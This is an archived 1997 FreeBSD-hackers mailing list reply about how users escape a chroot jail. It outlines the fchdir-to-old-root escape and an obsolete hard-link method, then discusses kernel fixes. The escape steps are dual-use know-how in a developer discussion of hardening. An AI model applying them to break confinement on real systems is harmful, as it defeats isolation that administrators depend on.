From owner-freebsd-hackers Wed May 28 21:58:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA24518 for hackers-outgoing; Wed, 28 May 1997 21:58:07 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id VAA24508 for ; Wed, 28 May 1997 21:58:03 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 1.60 #1) id 0wWxHX-0002Fs-00; Wed, 28 May 1997 22:57:47 -0600 To: "David E. Cross" Subject: Re: Correct way to chroot for shell account users? Cc: Peter Korsten , Jaye Mathisen , hackers@freebsd.org In-reply-to: Your message of "Thu, 29 May 1997 00:41:43 EDT." References: Date: Wed, 28 May 1997 22:57:47 -0600 From: Warner Losh Message-Id: Sender: owner-hackers@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message "David E. Cross" writes: : Could someone give me some simple details of how to break out of a chroot : 'jail' (without relying on kernfs or raw devices), I have heard of this : before, but no one has given me a theory or code of how to do it. Basically, and this has been posted in many places, you get a handle on something outside the jail. You do this by basically opening '/', mkdir xxx, chroot xxx, then fchdir to the old '/' and then chdir '..'. There are things that can be done in the kernel, but they are either very expensive or very hard to get right (and not break anything) or both. A simple fix is to disallow a chroot when someone has already been chroot'd. This break symetry, but doesn't completely solve the problem because there are many other ways out (that aren't on the top of my head). Hmmm, writing this up, I realized what the ln way was. If you are in a chroot jail, you mkdir xxx; ln xxx/yyy /; chroot xxx; cd yyy; cd .. ; ... and you are out. However, the ln step is no longer allowed since it is hard linking directories together, which is bad for other reasons. Warner